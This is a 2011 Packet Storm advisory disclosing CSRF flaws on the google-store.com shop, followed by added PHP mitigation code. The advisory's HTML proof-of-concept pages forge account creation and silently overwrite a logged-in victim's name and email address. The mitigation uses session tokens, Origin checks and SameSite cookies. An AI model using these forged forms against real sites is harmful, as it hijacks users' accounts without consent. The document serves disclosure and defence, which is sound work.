Google Store Cross Site Request Forgery

2011-08-27T00:00:00
ID PACKETSTORM:104519
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-08-27T00:00:00

Description

                                        
`#  
#[+]Exploit Title: Google Store Multiple XSRF Security Vulnerabilities  
#[+]Date: 26\08\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Vendor Link: https://www.google-store.com  
#  
  
#################################### Add User ####################################################  
<body style="background-color: black; color: white;">  
<form action="https://www.google-store.com/create_account.php" method="POST">  
<input type="hidden" name="action" value="process"></input>  
<b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>  
<b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>  
<b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>  
<b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>  
<b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>  
<b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>  
<input type="hidden" name="country" value="30"></input>  
<b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>  
<b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>  
<b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>  
<input type="hidden" name="newsletter" value="1"></input>  
<input type="hidden" name="x" value="47"></input>  
<input type="hidden" name="y" value="15"></input>  
  
<input type="submit" value="Send Request"></input>  
</form>  
#################################################################################################  
  
################################### User Profile Information Editor #############################  
<title>Google Store Profile Information Editor CSRF Vulnerability.</title>  
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">  
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>  
Steps to reproduce:<br><br>  
1. Log in to <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>  
2. Open this exploit and click OK.<br>  
3. Check your profile configurations. :)<br><br>  
Are You Ready?  
</h1>  
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">   
<input type="hidden" name="action" value="process"></input>  
<input type="hidden" name="firstname" value="Owned"></input>  
<input type="hidden" name="lastname" value="Owned"></input>  
<input type="hidden" name="email_address" value="Owned@gmail.com"></input>  
<input type="hidden" name="telephone" value="123456789"></input>  
<input type="hidden" name="fax" value="9876543210"></input>  
<input type="hidden" name="x" value="99"></input>  
<input type="hidden" name="y" value="99"></input>  
</form>  
#####################################################################################################  
`
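
Both forms above are accepted because the endpoints act on any POST that arrives with the victim's session cookie. The following server-side check is an added example, not part of the original advisory or the vendor's code; the `csrf_token` field and the functions `csrf_token()` and `csrf_check()` are hypothetical names, and the sample requests are constructed from the field names in the advisory.

```php
<?php
// Added example: session-bound anti-CSRF token check for state-changing POSTs
// such as create_account.php and account_edit.php. Names are hypothetical.
declare(strict_types=1);

const ALLOWED_ORIGIN = 'https://www.google-store.com'; // site origin as given in the advisory

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];
}

/** True only if the POST carries the session's token and any Origin header matches the site. */
function csrf_check(array $session, array $post, array $server): bool
{
    // Browsers attach Origin to cross-site POSTs; reject a foreign one outright.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== ALLOWED_ORIGIN) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty or non-string token never passes.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// --- Constructed demonstration (PHP CLI, no web server needed) ---
$session = [];                    // stands in for $_SESSION of the logged-in user
$token   = csrf_token($session);  // the real form would carry this in a hidden field

// Body sent by the advisory's auto-submitting page: no token, foreign Origin.
$forged = ['action' => 'process', 'firstname' => 'Owned', 'lastname' => 'Owned',
           'email_address' => 'Owned@gmail.com'];
// Same fields submitted from the site's own form, token included.
$legit  = $forged + ['csrf_token' => $token];

var_dump(csrf_check($session, $forged, ['HTTP_ORIGIN' => 'https://other-site.example']));
var_dump(csrf_check($session, $forged, []));   // Origin header absent, token still missing
var_dump(csrf_check($session, $legit, ['HTTP_ORIGIN' => ALLOWED_ORIGIN]));
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a second layer, since the browser then withholds the cookie from cross-site form POSTs.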